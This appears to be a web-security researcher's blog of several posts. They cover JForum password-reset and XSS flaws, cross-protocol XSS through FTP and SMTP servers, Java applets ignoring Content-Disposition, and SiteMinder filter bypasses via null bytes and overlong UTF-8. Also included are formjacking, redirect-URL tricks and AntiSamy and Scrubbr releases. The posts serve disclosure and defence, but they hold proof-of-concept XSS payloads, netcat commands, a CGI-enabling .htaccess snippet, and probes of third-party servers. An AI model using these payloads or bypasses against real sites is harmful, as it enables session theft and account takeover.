because arshan’s too cheap to license OneNote

Browsing Posts published by arshan dabirsiaghi

The application I beat up for the ESAPI WAF preso at OWASP AppSec DC was JForum. It’s awesome, free, open source forum software that is quite popular (CBS, EA and the Ukrainian government seem to like it). That aside, it’s got serious security problems. I disclosed these problems to them, um, around a month ago or so, and some of these vulns are interesting for one reason or another, so I thought it’d be good to highlight a few here.

Vuln #1: Hijack accounts with “Forgot Password” token prediction

You don’t have to be Nate Lawson to discover this obvious security flaw, which from a blind test may appear secure.

The “forgot password” feature suffers from a critical design error. The application allows users to automatically reset their password through a “lost password” form. That form only requires a user to enter an email address or username. When the form is submitted, the application sends an email containing a token to the associated user’s email address. When the user clicks on the link with the token in it from the email, the server will then allow the user to reset their password through a form. In this design, the token is acting as a temporary password for the user. Therefore, if an attacker can predict the value of the token the application will generate, they will be able to reset account passwords for other users.

Unfortunately, this scenario is possible. The following code is from, starting at line 671:

public User prepareLostPassword(String username, String email)
String hash = MD5.crypt(user.getEmail() + System.currentTimeMillis());
um.writeLostPasswordHash(user.getEmail(), hash);

As can be seen in the code snippet, the secret token is an unsalted hash of the user’s email address and the number of milliseconds since the epoch. Neither of these pieces of information qualify as secrets in a strong cryptosystem. All that is needed to reset a user’s password to a password of the attacker’s choosing is the email address of the victim and the ability to generate a few thousand requests.

An exploit was made to demonstrate this vulnerability. It’s currently tuned to attack a local development environment, but it can be used to attack any site by changing a few variables (and adding a time difference offset). Since the application leaks the server’s time in several places, it’s possible to increase the efficiency of the exploit so that remote systems only require a few hundred packets. The exploit is available here.

Vuln #2: The first and last interesting XSS flaw in the world

JForum has a reflected XSS flaw whose exploitation is uniquely non-trivial. To start: in my development environment, this URL causes an alert box to pop up, containing my session cookies:


This is an interesting story, and the reason this fires is complex, as far as XSS goes. First, that type of URL won’t normally be found in JForum. The typical URL structure is RESTful. For example, the URL to list the recent posts in a category would look something like this:


This is parsed by JForum into a “module” and an “action”. The “recentTopics” substring represents the “module” of this URL, and “list”, the “action.” However, there is an alternative and possibly legacy representation for URLs that is honored by JForum, where URLs look like this:


The “servlet” substring in this URL is arbitrary, since JForum’s main engine catches all requests aimed at “*.page” and handles them identically based on parameters. This will end up making an attack signature difficult, as will be shown later.

Normally, no user input in JForum is rendered without encoding. The text being output in this example is being done so by Freemarker, the templating system used by JForum. Because the template to execute is supplied by the user (the ‘js’ parameter), the user can choose any file on the target filesystem. If the file is not a pre-approved template, the application will error without doing anything necessarily beneficial to the attacker. The only alternative, then, is to provide a template that the application won’t have correct contextual data for. This will happen, for instance, when a normal user attempts to view an admin template. When the expected data isn’t found this will inevitably cause a problem, after which Freemarker will print an error message that contains the filename being executed, along with other data which is not controlled by the user.

So, the only way for this to be useful is if the filename contained an attack. How could the filename be both an attack and a valid template location? This is about the time a normal developer would cry theoretical and reject the vulnerability. Unfortunately for them, by supplying the null byte followed by a traditional XSS payload after the template location, we can make both JForum/Freemarker and the attacker happy. When JForum/Freemarker look up the filename, the file system will acknowledge that the file exists and is a pre-approved template. However, when the filename is printed out by Freemarker after the error occurs, it will echo the entire filename parameter, not just the part of the filename understood by the lower level APIs. Because the attack is part of the extended filename, it gets echoed to the browser, and the JavaScript fires.

This vulnerability could not exist without 3 combined failures of the OWASP Top 10: flawed error handling (printing detailed error information), direct object references (specifying arbitrary templates in the URL) and XSS. This is a credit to the code of Rafael Steil, the maintainer of JForum, who otherwise makes a (relatively) security conscious product.

Note: One might guess that the ability to specify arbitrary template constitutes an elevation of privileges. The templates are read-only and are publicly available, since the forum software is OSS. For it to be useful, the application would first have to queue the relevant admin information into memory before processing the template. This would require a separate vulnerability.

For giggles, though, there are other XSS flaws that are much more vanilla:


Now, how do we fix these in the ESAPI WAF?

These were not the vulnerabilities I used in my demo because they were not very clean to fix with a WAF (of any kind, not just mine). Unfortunately, they were two of the most serious vulnerabilities.

The account hijacking vulnerability is not possible to stop with a WAF without IP-based throttling, which is butthurt. This is the case because the attack is possible unauthenticated, so there’s no way to differentiate between legitimate “forgot password” resets and attacks. Come to think of it, the WAF could also just prevent all access to that feature until you get the code fix in. Does that count?

It’s possible but annoyingly inefficient to signature the complicated XSS with a simple virtual patch rule. First you’d have to signature a substring of the URI to detect that particular module being executed and then also signature the “js” parameter to detect non-alphanumerics. Given the fact that JForum can have multiple URLs for executing the same functionality, this protection doesn’t give a whole lot of assurance.

But wait, there’s less (security)

There are a ton more problems, like CSRF, unchecked redirects, no frame-breaking code and more. For the full writeup that I sent to the developers, click here.

The ESAPI project is quickly gaining steam. We’ve added a number of strong committers and there are many companies out their adopting. My little addition to ESAPI was just released yesterday at OWASP AppSec DC, the ESAPI Web Application Firewall. Slides here.

You don’t need to implement the rest of ESAPI to use it, since it’s completely decoupled. It’s being published as part of ESAPI since virtual patches are an enterprise security need – and that’s what ESAPI is all about. The WAF was built for the Java version, but there’s nothing so specific to Java that would make it difficult to port to the other versions of ESAPI (assuming they have some BeanShell equivalent, which I think they all do).

What does the WAF offer? Well, a lot. It can stop all your normal injection attacks, like any WAF should. It’s closer architecturally to the application since it lives in a J2EE filter, and this allows it to do things a normal WAF can’t, like fix “business logic” vulnerabilities such as missing authentication or authorization.

It can also solve a number of “lesser” problems you’ll run into after a security assessment, like enforcing HTTPS, HTTP method restriction, or adding missing caching or content-type headers. You can also use it to perform fancy egress filtering, if you’re so inclined. All without touching a single line of code!

I can also make a strong case for performance, since the WAF doesn’t have to manage its own I/O or state, since that’s all handled by the application server. The performance hit, especially if you’re not doing any crazy egress stuff where response data must be buffered, is minimal.

Anyway, it does way more than  blog post could do justice. Check out the policy file configuration guide or the JavaDocs, and keep the ESAPI mailing list in the loop on your integration experience!

It’s available for download now as part of ESAPI 2.0 RC4.

UPDATE: kuza55 has pointed out correctly that the cookie-sharing across ports is universal; IE’s quirk is the port-ignorance during SOP checks.

Most people have thought about how you can use a browser to issue inter-protocol requests. See Samy’s version of SMTP-through-JavaScript, “cross-site” printing (cool, but what’s so cross-site about it again?), and this paper by NGS. However, the reverse attack is much more useful; how causing a browser to interact with another protocol can cause arbitrary JavaScript to run in the origin of a target domain. This is natural extension to that previous work, starting with the seminal “form protocol attack” paper. After doing a bunch of research I found out that this basic idea was already lightly covered in eyeonsecurity’s “extended HTML form attack” paper, but misses out many key details, mostly resulting from the fact that the browser security landscape has shifted significantly since it was written in 2002.

Let’s start from the beginning. First, this is going to be a corner case, to be sure, but the Internet is like Drake’s equation – there’s always going to be sites where unusual attacks work.

Where to start? Consider first that a browser won’t let you use HTTP to talk to any site on port 20 or 21 – the typical FTP ports. This means that if there is FTP running on any other port, you will be allowed to send requests to it. What if that FTP server responded? Well, you would think the response would be meaningless to the browser since it’s not valid HTTP.

The head-scratching behavior of browsers continues. None of the browsers I tested (IE, FF, Safari, Chrome, all recent versions) require HTTP response headers to process a request. I have no idea why that is, and this appears to be a very little known fact according to some personal polling at Blackhat. If you want to see it in action, here’s your netcat command:

[root@i8jesus ~]# echo "<script>alert(document.cookie)</script>" > script.txt
[root@i8jesus ~]# nc -l 81 < script.txt

This opens up port 81 and pipes the script to any incoming TCP connection. Try pointing your browser to that port, i.e., http://localhost:81/foo. You’ll see the alert() does fire! This is more than just content sniffing, it’s protocol sniffing.

But even if you could control the output of another port on their server, you might initially be disappointed. In the minority browsers this will be an interesting but useless quirk because the port you’re connecting to (81) is not the same port of the target website (typically 80). Because of this, your browser will consider it a different origin and thus won’t let you do anything cool like access cookies or application data.

If you’re into browser security, you probably realize where this is going. IE, the dominant browser, ignores the port when considering DOM origin. This means that document.cookie is shared between and In IE7, the only thing you can’t do across ports is XmlHttpRequest, but don’t worry – IE8 is going to remove that restriction soon!

You can see here IE ignores the port, since its showing my WP cookies

You can see here IE ignores the port, since it's showing my WP cookies

Now let’s consider there’s an FTP server running on, port 81. You can interact with that FTP server with the following HTML. Notice the enctype=’multipart/form-data’. This is what allows us to make our input look like FTP commands (as was seen in previous cross-protocol attacks).

<form method='POST' action='' enctype='multipart/form-data'>
<input type='text' name='doesntmatter' value='USER anonymous'>

<input type='text' name='doesntmatter' value='PASS'>
<input type='text' name='doesntmatter' value='HELP foo'>

<input type='submit'>

If an FTP server is running on port 81, the browser will connect to it and begin sending that multipart data. Let’s look at a real example of this happening and see how the FTP server understands the traffic. In order to facilitate this testing, I piped netcat output from my browser to a different netcat process connected to (I had to use myself as a MITM since they listen on a standard port). Here’s a snapshot of of our traffic from the HTML form above:

Content-Type: multipart/form-data; boundary=---------------------------7d92b92a70534
Cookie: <snip>

Content-Disposition: form-data; name="doesntmatter"

USER anonymous

Content-Disposition: form-data; name="doesntmatter"


Since FTP separates commands by newline, the server will see  bunch of garbage commands with a few legitimate ones sprinkled in between. What the server sent in the response can be seen from the output of the netcat commands:

[root@i8jesus xps]# nc -l 81 | nc 21
220 Red Hat FTP server ready. All transfers are logged. (FTP) [no EPSV]
530 Please login with USER and PASS.
530 Please login with USER and PASS.
331 Please specify the password.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
230 Login successful.
550 Permission denied.
214-The following commands are recognized.
214 Help OK.
550 Permission denied.

As you can see the FTP server at is clearly interpreting our HTTP traffic as separate FTP commands. Great, but now what? This is where previous attacks in the cross-protocol arena have ended. Most of the time this type of attack won’t profit the attacker much. How easy it to go to Starbucks and issue those FTP commands yourself? It’s true that tricking the user into doing it may allow you to reach hosts behind firewalls and get around IP-restrictions, but we can do better than that. So, put together what we’ve discovered so far:

1. Browsers will interpret non-HTTP responses
2. Browsers can communicate with non-HTTP servers as long as they reside on a non-standard port
3. FTP servers will interpret our commands line by line
4. IE ignores the port in origin checks

Here is the crux: we can issue FTP commands that the server will partially reflect back to the client. If this input contains JavaScript, the browser will execute it in the target origin. Let’s see what we can get some anonymous FTP servers out there to reflect back to us. The user input is in green and any interesting server output is in red:

[root@i8jesus xps]# telnet 21
Connected to
Escape character is '^]'.
220 FTP server (Version 6.00LS) ready.
500 H<SCRIPT>ALERT(DOCUMENT.COOKIE)</SCRIPT>: command not understood.
HELO <script>document.cookie)</script>
500 HELO <script>document.cookie)</script>: command not understood.

Looks like this server will upper-case the FTP command name during reflection. That will complicate things a bit (you can still exploit that with VBScript), but why not make things easier on ourselves and use the argument to HELO (a STMP command that the FTP server doesn’t recognize), since that comes back without modification! Ok, now let’s test a .mil:

[root@i8jesus xps]# telnet 21
Connected to
Escape character is '^]'.
220 emissary FTP server (Use of this DoD computer system, authorized or unauthorized, constitues consent to monitoring of this system.  Unauthorized use may subject your to criminal prosecution.) ready.
HELO <script>
500 'HELO': command not understood by proxy
USER <script>alert(document.cookie)</script>
331 Password required for <script>alert(document.cookie)</script>.
PASS i dont want anything to do with you im just testing something dont rape me plz <3
530 Login incorrect.

This server reflects the USER argument. Simple, no authentication required.

Out of the few servers I’ve tested, it looks like vsFTPd is the safest in that it won’t reflect much data pre-authentication. (Un)fortunately, it looks like there are plenty of pre-authentication options and a few post-authentication options for reflecting data in most FTP servers. There are lots of FTP servers out there and lots of configurations to play with, resulting in an uncountable number of possibilities for vulnerability.

What this all means: running an FTP server on the same host as your site on a non-standard port  probably makes you vulnerable to Type I XSS without you doing anything wrong. I don’t imagine it’s going to happen a lot, but I do imagine it’s going to happen.

The Solution

The solution, to me, is simple. Invoke your FindMimeFromData() equivalent on the HTTP response body, not the complete inbound TCP message. When did browsers decide to speak other protocols than HTTP? The specification doesn’t say the status line is optional. If I want to talk to an FTP server I’ll use WinSCP. Fair? Only give me shit that starts with “HTTP/1.X YYY”. It’s kind of ironic that IE processes the response successfully, but the response breaks Fiddler. Doesn’t Mr. Law, um, have a foot in both those camps?

It’s not an FTP problem

Yes, all of what I’ve said applies to other services as well. IE doesn’t block nearly as many ports as Firefox. For instance, here’s an interesting snippet from Cyrus (SMTP), which shows that exploitation is not necessarily brain-dead simple, and by the end you can see that there are enough characters to perform XSS.

[oasis@i8jesus ~]$ telnet localhost 25
Connected to localhost.
Escape character is '^]'.
220 ESMTP Postfix
HELO <script>alert(document.cookie)</script>
EHLO <script>alert(document.cookie)</script>
250 DSN
MAIL FROM: <script>alert(document.cookie)</script>
501 5.1.7 Bad sender address syntax
RCPT TO: <script>alert(document.cookie)</script>
503 5.5.1 Error: need MAIL command
555 5.5.4 Unsupported option: Blow
250 2.1.0 Ok
RCPT TO: <script>alert(document.cookie)</script>
501 5.1.3 Bad recipient address syntax
RCPT TO: sdf
550 5.1.1 <sdf>: Recipient address rejected: User unknown in local recipient table
RCPT TO: img src='javascript:alert(1)'
555 5.5.4 Unsupported option: src='javascript:alert(1)'
RCPT TO: img/src='javascript:alert(1)'
501 5.1.3 Bad recipient address syntax
RCPT TO: img/src=javascript:alert(1)
550 5.1.1 <img/src=javascript:alert>: Recipient address rejected: User unknown in local recipient table
RCPT TO: img/src=javascript:alert{}
550 5.1.1 <img/src=javascript:alert{}>: Recipient address rejected: User unknown in local recipient                table
221 2.0.0 Bye
Connection closed by foreign host.
[oasis@i8jesus ~]$

Billy Hoffman and Matt Wood from HP presented on a new browser darknet at Blackhat, which of course the press went totally batshit for (the press love Billy et. al. as much as they love anyone – or HP’s marketing department is insanely good). I love the idea of totally anonymous P2P information sharing, but it’s just not possible in the browser if we can’t use trusted plugins. In a truly safe P2P scheme the supernodes wouldn’t have to be trusted, but this is not the case in Veiled, as they were in fact willing to point out (and gloss over just as quickly :). The simple fact is that the supernodes deliver client-side code to the nodes – code that, when not compromised, contains JavaScript that will allow the user to perform all the functions necessary for a darknet, but when compromised, can be used to subvert all those same functions. As long as you’re getting your client side code from supernodes, it just can’t be done.

With all that aside, it’s still useful research (to me). The unknown compromise of a supernode is very unlikely, especially considering the overall incompetence on the part of those who would try to shut down a darknet. And to honor the spirit of the idea, I wanted to talk about some solutions to a few of the “challenges” they noted when architecting the design of their darknet:

Problem: When a user is on the darknet they store file slices in browser local storage, which is restricted by domain. Consider that a darknet client, Alice, is connected to supernode If the supernode is to go down, the user must go join a different supernode. The problem is: what happens to the file slices? They’re in local storage – which means when the user transfers themselves to the next supernode,, the JavaScript won’t have access to the file slices.

Solution #1: They considered this a lost cause, but I think there are a couple of things you could do to retain the file slices without exposing the information to the new supernode, which clients shouldn’t have to trust. First, the initial request to go to the next supernode could be a POST request of the following format:

POST http://nextsupernode/reflect_files_back_to_me#hashoffiles


The server could then reflect the response for the clients to restore, complete with a hash to check (just for CRC). The second approach is slightly more complicated but allows for a general solution to the problem of “lost information” (like chat logs, keypairs, etc.) because of the origin-hopping.

Solution #2: Mallory, a user who isn’t on the darknet, tries to connect to Because her IP isn’t whitelisted, the DNS server for sends back wrong IP information (like the IP for maybe?) or refuses to resolve. Mallory therefore can’t connect to the darknet. Alice, a legitimate darknet user, connects to Because the darknet knows her IP address, the DNS server returns a legitimate response and allows her the chance to authenticate to the darknet, then redirects her to an alias –

The first thing the client-side code from the darknet gives to Alice does is this:

> document.domain = '';

Alice then grabs some file slices in order to help everyone share the risk of getting DMCAwned. Now imagine supernode ‘www1′ gets burned. She gets kicked off the darknet and has to find a new supernode. Once she authenticates to the next supernode, she is redirected to a sequentially enumerated sub-domain, ‘www2′. Because the next supernode is still a subdomain of the previous darknet domain, she can again execute the same code:

> document.domain = ''

Now she’ll have the same access to those files and the information is not lost – no need to go grab the new file slices because the old ones are still here in local storage!

Side notes
There is a pretty minor weakness in this approach – if a bad guy can hijack a supernode subdomain and trick her into visiting it (while her browser is still pinning the legitimate supernode IP address, otherwise any request to it would be redirected to a new, safe supernode), that bad guy can grab the local file slices with malicious code.

Also, using DNS as a control mechanism can probably also cause some darknet-fail due to its centralization, but you can always fall back to a less restrictive model when DNS is unavailable due to compromise. On top of that you can rotate authoritative nameservers much faster than in years past.


I’m sure you were totally rivitted by that – in fact I’ll try to do more posts on improving the virtual defenses of a virtual darknet. There are other ways of improving it and plenty more ways to attack it, but the rest are even more boring than this. Hope you enjoyed Blackhat!

Using “Content-disposition: attachment” when streaming user-uploaded files is unfortunately incomplete protection against all cross-origin issues. Most savvy testers know that without it, a user could send a victim a link directly to a malicious uploaded file or <iframe> it in from their evil site, causing XSS & SSRF. When this header is sent down in response to a request, even if from an iframe, the browsers will force the user to download the file or cancel the request.

If they save and execute the file, they’re even more out of luck since locally privileged files are just as good as malware – but the forceful prompt is generally thought to better than the definite risk posed by not sending the header. Bottom line: the header is something you should send.

Developers seem to know this, too. I encountered this header for a second time in recent months, and in a way I’d guess was partially motivated by security. Given that I don’t think a lot of people know why it’s not good enough alone, I thought I’d write something up here.

HTTP is to firewalls as Java is to Browser Security
If you can upload arbitrary files to a site that can stream them back to you with a permalink, you can use Java to XSS other users of the site if you can trick them into visiting your site. If you remember from the GIFAR problem that Java’s same-origin policy, like Flash’s, is backwards, the issue will be easy to understand. If you don’t remember, here’s Java’s SOP in a nutshell: Java applets are only allowed to interact with the host where they were downloaded from, not the context where they’re being executed. This is the opposite of the browser’s normal active content SOP. If you <script src=http://X/foo.js>, the context of execution will be the current page, not origin X.

With that in mind, consider the crux of my message today: Java ignores the Content-Disposition header. This means that if you can upload a class file or jar file to a site and that file can be permalinked, then you have cross-origin applet capabilities. Here’s the timeline of an attack, which is similar to that of a Type I POST XSS:

0. Mallory creates an evil applet that connects back to its host and issues a few key HTTP requests to change a profile email address
1. Mallory uploads the evil applet to
2. Somewhere else on the web, Alice logs into the site,
3. Somehow, Mallory tricks Alice into visiting her site,
4. gives Alice HTML that contains an <applet> tag that points back to Mallory’s evil applet on

<applet code=’EvilClass’ archive=’http://victim/users/myuser/evilfile.jar’>

5. The evil <applet> executes with Alice’s ambient authentication, and changes her email address to one that Mallory owns
6. Mallory resets the password on the account and Alice’s new password is sent back to Mallory

I couldn’t find much record of Java’s ignorance of the Content-Disposition header. I see kuza55 & stefano mention this fact somewhat quietly in what appears to be an excellent RIA slidedeck, but there’s no mention of it in Java documentation, the Browser Security Handbook, or any other reference I could find.

Keep in mind that, by the way, that Mallory doesn’t need to upload a file with a .class or .jar extension in order to include it remotely; she could also upload a file with an extension  users are more likely to want, like .zip. Hell, you can probably store the serialized applet in any extension and invoke it with object=serializedApplet – I haven’t tested it and you shouldn’t be relying on extension checking for security, anyway.

The fix

The fixes, as always, are simple once you think about it in terms of what the application can do that the attacker can’t.

Fix #1: Require a POST to access the file. Although this is the least future-safe approach, it’s quick and it’s something you can make work in a WAF or in server configuration files. The attacker can’t force an <applet> tag to retrieve its content with a POST.

Fix #2: require a CSRF-quality token when downloading the file. This will require a forwarding action to front access to the files, but it’s a sturdier approach, long term.

Think before you save

Something else I’ve noticed – developers don’t think too creatively on defense when allowing users to control the names of their uploaded files. Aside from obvious null byte problems, developers are mostly smart enough to prevent files such as .php, .jsp, etc., from being stored, they typically don’t think about other types of files that
are also dangerous. Let’s imagine a site with the following structure for accessing user-provided files:


Here are 3 good questions to get you started thinking about alternate exploitation scenarios when testing file upload mechanisms:

1. Can users choose their own name during registration?

I’ll upload a file called ‘’ for my new user, ‘en-US’. The browser’s content sniffing will find the HTML in my file that has an unscary file extension and render it to my phishing victims the way I wanted. The Content-Disposition header stops this type of attack.

2. Have you considered files that have special meaning to web technologies?

I’ll upload my own application.cfc with whatever server-side code I want to execute (maybe an onRequestStart() request logger?)

If it’s not a ColdFusion app I could upload my own crossdomain.xml! Flash++!

If you don’t like Flash’s weird programming model you could just upload your own .htaccess, which  allows you to do some cool shit – like force Apache to interpret my text file that I previously uploaded as a server-side CGI script with 2 lines:

Options +ExecCGI
AddHandler cgi-script txt

3. How good is that character validation of user-supplied file names, really?

Consider the old trick of ending a file name with :DATA in NT filesystems in order to get to the default data stream of a file without ending with the normal extension. Or maybe the application doesn’t canonicalize invalid Unicode, which you could abuse in countless ways – most notably because parameter.indexOf(“..”) == -1.


Hopefully you got something useful out of that. For anyone else that’s here, I’m already in Vegas getting ready to teach before the con starts – Twitter me if you’re going to be around and want to drink a beer or grab some sushi! P.S. grab a seat for Jeff’s talk on malicious code – scary one for the CSO’s.

Last year Jeff Williams and I discovered 2 critical flaws in SiteMinder. Rather than just sitting on the flaws or leaving the client to report them, we decided to experiment with responsible disclosure with the company who manages SiteMinder, Computer Associates (CA). The process was painfully slow and from our perspective a little disrespectful. For months they kept asking for details about the product version and configuration – details that we told them we didn’t know and couldn’t provide without being a major annoyance to our customers. We repeated ourselves and kept pressing for them to fix it.

We repeatedly asked for status, considering the fixes should be relatively easy and we got very little information until now. The timelines in the responsible disclosure guidelines by Wysopal & Christey were obliterated by CA. We just got an email after months saying they just tested their latest build (something we suggested they do on day one) and that the attacks appear not to work anymore.

This response, after thinking a bit, seems like an insult to my intelligence. The attacks haven’t not worked on any SiteMinder-protected application we’ve tested since last year. All of a sudden they decide it’s important and test their latest build and it no longer works? Apply some critical thinking skills and ask yourself what is more likely:

  • They randomly fixed both of these vulnerabilities before we reported it. Keep in mind the following facts:
    • We are seeing them work in the wild 24/7
    • There are no advisories regarding these vulnerabilities on their advisory blog
    • It took 6 months for them to “get around” to testing our 2 newly reported critical vulnerabilities
    • or…
  • They took our information, spent the last 6 months fixing the vulnerabilities quietly, and now have plausible deniability

So much for responsible disclosure.

The motivation for researchers to find flaws is credit. Credit is the currency we deal in. As gaz pointed out on Twitter, “bug hunting is fun”, but at the same time bug hunters are also providing an extremely valuable service and should be compensated in some way for the bugs they find. Credit to the researchers in a patch or advisory is the only currency that vendors have been willing to pay, especially for layer 7 bugs. You think ZDI’s paying me for my XSS?

So, since the bugs have been “fixed” we can now talk about them, right?

What is SiteMinder?
SiteMinder, for the uninitiated, is a  security gateway that sits in front of 80-90% of corporate America’s J2EE applications. It’s used to provide authentication, URL authorization and XSS protection on GET requests.

Although it’s used to protect J2EE applications, SiteMinder itself is written in an unmanaged language.

Flaw #1: Complete XSS-defense Bypass Through Null-Byte Injection
Normally, passing almost any special characters in a GET request to SiteMinder will cause an error to occur. It’s practically impossible to XSS a SiteMinder application through a GET because of this. The user data must land inside a JavaScript context, unquoted attribute, or some other unusual scenario for exploitation to be possible. Passing data in via a POST is the low-tech way to do this, but it’s not ideal for reflected XSS.

Jeff was testing this mechanism and he tried prepending his payload with %00. SiteMinder didn’t see the attack because it recognized %00 as the end-of-string character. Here’s some text from our disclosure to them:

The following URL, which attempts to exploit a non-existent XSS vulnerability in the a page will be caught by Siteminder’s XSS protection:


However, prepending the parameter value with a null byte directly will cause the parameter value to go unnoticed by the protection mechanism, as can be seen in the following URL:


This indicates that the code for parsing parameters is done in an unmanaged language like C or C++ and interprets the null-byte as the end of string character. Unfortunately, Java considers the null byte just another part of the string, so what comes after it is used in the vulnerable page and the reflected XSS will be fired.

Flaw #2: Complete XSS-defense Bypass Through Canonically Decomposable (aka “overlong”) Unicode
This one we anticipated would be harder to fix since it would require some architectural re-thinking. By passing an “overlong” version of a SiteMinder-blacklisted character (like %e0%80%bc for ‘<’) you could get the attack to pass SiteMinder’s check, which obviously worked at the byte or ASCII-character level. However, when the J2EE application server got a hold of the multi-byte character sequence it canonicalized the data into Unicode (Java uses UTF-16 under the hood). Here is some text from our disclosure to them:

There are a multitude of issues when interpreting UTF-8 in a gateway security mechanism. Invalid UTF-8 of all forms, including overlong UTF-8, using best-fit mappings and performing normalization can all cause problems. The following URL will be caught by SiteMinder because it contains a ‘<’.


However, passing the following URL will not trip the protection mechanism:


The seemingly random assortment of bytes (0xe080bc) is reduced to the ‘<’ character when its consumed into a Java String object because the JavaVM understands and reduces this inappropriately long representation of a UTF-8 character. Strictly looking for the 0x3C byte to detect ‘<’ characters will always fail because of this, so the SiteMinder protection needs to be Unicode aware. These issues are presented well in the Unicode technical report #36:, specifically in section 3.

That’s our story. At the end of the day, we didn’t get credit from CA, but our bugs supposedly got fixed, so we’ll call it a push.

P.S. Anyone interested in finding a more vulnerabilities in SiteMinder should try to use these techniques in different areas. For instance, sending in a canonically decomposable version of an entire URL may prevent any SiteMinder rules from matching, and in those cases where the default resource setting is “UNPROTECTED”, this may amount to a complete authentication and/or authorization bypass. The null byte may be also used in other avenues, but you won’t be hearing about any more flaws I find. =)

A colleague of mine, Jerry Hoff, was testing AntiSamy a while ago and he found an interesting technique he quite hilariously and tongue-in-cheekly called “formjacking.” Once we dissected the payload we found a very strange cross-browser behavior. I wanted to talk about it but never had a chance until now.

It seems that FF3 and IE7 respond uniformly and strangely to self-contained XHTML in many cases. We had encountered this behavior before in responding to functional “bugs” in AntiSamy (though I am not surprisingly more inclined to blame them on the browser). When the browser sees the following text, the words “anna faris deserves better” are shown in italics:

<i /> anna faris deserves better

Everything that came after the self-contained italic tag was italicized. The same behavior was found for the bold and underline tags. In AntiSamy we special-cased those and other basic formatting tags to be removed if they were self-contained, and we thought we were done.

Fast forward to Jerry’s payload. Jerry was passing in the following string:

<form action="">

Jerry wanted to pass in an extraneous opening form tag that would pre-empt the other <form> tag in order to steal the profile data when the user hit the submit button. He was counting on something like this appearing after the application reflected his input:

<!-- begin evil user-supplied data -->
<form action="">
<!-- end evil user-supplied data -->
<form action="/good/updateProfile">
<textarea name='profile'></textarea>

He was hoping that the browser would ignore the original <form> tag which has been nested by his attack string. This would work across browsers as you can demonstrate for yourself on this test page. This type of attack never worried me with AntiSamy because I knew that AntiSamy balances input. Because Jerry didn’t have properly formed XHTML in his input (he only had an opening tag and no closing tag), AntiSamy cleaned it up for him and his resulting profile was this value:

<form action=""/>

Notice that it is self-contained. Little did I know that I should be worried about this. Much how the self-contained tags <b/> and <i/> embolden or italicize the rest of the page, this self-contained <form/> tag somehow forced the browser to ignore the following <form> tag, and thus stole all the inputs on the rest of the page. So when the user hits the submit button, all the information is sent to!

I don’t think I’m alone in thinking this is very strange behavior. Because of the nature of XML, you would think that a self-contained <form/> tag should have absolutely zero impact on anything else on the page, including any other forms. This is not the case, obviously. You can find some simple test pages for mixing self-contained with non-self-contained <form> tags here, but the net result is this – if the attacker can provide a <form> tag before your <form> tag, they can steal the form data.

There’s probably more stuff you can do with this browser behavior. <script/>, anyone?

Last week I needed to beat a commercial product that was preventing an unchecked redirect vulnerability from being exploited. The input was being reflected into the location header, and anything that “looked like” a URL was getting blocked. After some laborious man-fuzzing (basically re-verifying the research I found existed after the fact in the under-utilized Browser Security Handbook) I discovered that the following is a valid URL when referenced by tags and in location headers in IE:


What about Firefox? Aside from the well known vector that doesn’t require an http at all (//, FF3 also appears to accept three leading forward slashes in a URL found in a tag/redirect:


There are lots of RFCs and official-looking documents that seem to contradictingly dictate what a legal URI looks like, so I’m quite inclined not to care who is right or wrong. For the record, lots of other random things worked when I was testing in the address bar and in a local file (like so let me save you some time and tell you that’s a bad place to test. Most of the things you find work there won’t work anywhere else.

So, in order to make their page really reflect all the necessary information, I think the Google Security team should split out the scheme/slash row in the URL table to indicate whether or not a URL scheme/slash combination “works” when encountered in in a 302 location header, src attribute, as a link, or in the address bar. Hopefully that will be a well-maintained document but I know it is probably a huge pain in the ass to keep such a cutting-edge resource continually up to date.

Happy nowruz!

Go download!

The changes:

  • Fixed empty element “bug” (a <b/> causes the rest of the page to be bold cross-browser, wtf? more on this later)
  • Fixed some bugs handling CSS colors, fonts and margins (negative margins not allowed and colors are now c14nized – thx to Jason Li and designbistro)
  • Added a usable pom.xml (thx to fernman)
  • Fixed a bunch of CSS policy file functional problems (thx to Jerry Hoff who is also working hard getting the .NET version to 1.0)
  • Added demo WAR to the downloads
  • Numerous other little bug fixes

The test cases all pass except one. The only one that fails is the one that is actually a problem with NekoHTML, the HTML parsing engine on top of which AntiSamy sits. As you can see here I provided him a working patch, test case, and justification. I’ve been watching their source tree closely and I don’t see any movement on this particular issue. However, as a group we decided to just live with it until they fix and no longer try to maintain a forked version of their library. I trust that they’ll eventually fix it, and you can still use my patch to fix your own version if that’s unacceptable.

Here’s what’s on the roadmap for 1.4:

  • full Maven support
  • SAX parser (should increase speed by ~50%)
  • programmatic access to the Policy object with guaranteed thread safety

As always, if you have issues, questions, or feedback drop us a line on the Google Code issue tracker or OWASP AntiSamy mailing list.

Thanks to all the people who submitted issues, patches and feedback. You guys are awesome.

Some backstory: When the Asprox mass SQL injection attack hit the web, HP teamed up with Microsoft and did a very cool thing. They donated a free, trimmed down version of their dynamic analysis tool called Scrawlr to the world. Scrawlr poked around your site, and if it detected SQL injection vulnerabilities, it let you know. Simple, useful, awesome.

When it came to fixing databases, people were at a loss in the beginning. Thanks to the blogotubes, database queries written by smart guys to detect and reverse the particular payload installed by the attack were spread pretty quickly.

Back to present day: Trying to find stored XSS in your database manually is insane. It just is. Even if you fix a stored XSS vulnerability with input validation and you’re convinced that it’s reliable, you could still have existing malicious data in your database that can still be used to harm your users. The fact is your database is probably just a huge abyss of data, and it’s not getting any brighter.

That’s why Aspect Security generously gave me work time to write a tool to automate that process. Even more generously, they donated the end result to OWASP (as they are wont to do). What resulted is a standalone GUI tool called Scrubbr, in hopefully obvious honor of and not theft from the Scrawlr folks.

Scrubbr allows you to get some visibility into your MySQL, MS SQL Server, or Oracle database when looking for XSS. It finds XSS vulnerabilities using AntiSamy as an engine. It can also actually fix any malicious data you encounter, also using AntiSamy. Fixing seems to work very well in MySQL and SQL Server but hasn’t been tested much in Oracle.

Here is a snippet from the OWASP page that talks about the use of AntiSamy in this context, as well as the “Fix” button:

Frankly, you’d have to be crazy to change production data with a tool you didn’t write yourself (and maybe even then). Trying to write a cross-platform database tool that can read and write is also a little crazy. The database technologies differ in so many stupid ways, and we mostly rely on JDBC to handle the interaction with the database. The “Fix” button is provided as-is, but of course we would like to hear about and fix your particular problem, and you can let us know about it at the issue tracker.

If you can tell Scrubbr how to access your database, it will search through every field capable of holding strings in the database for malicious code. If you want it to, it will search through every table, every row, and every column.

Scrubbr can detect input that doesn’t match up with an AntiSamy policy file. There is a subtle difference between “matching an AntiSamy policy” and being “detected as an attack.”

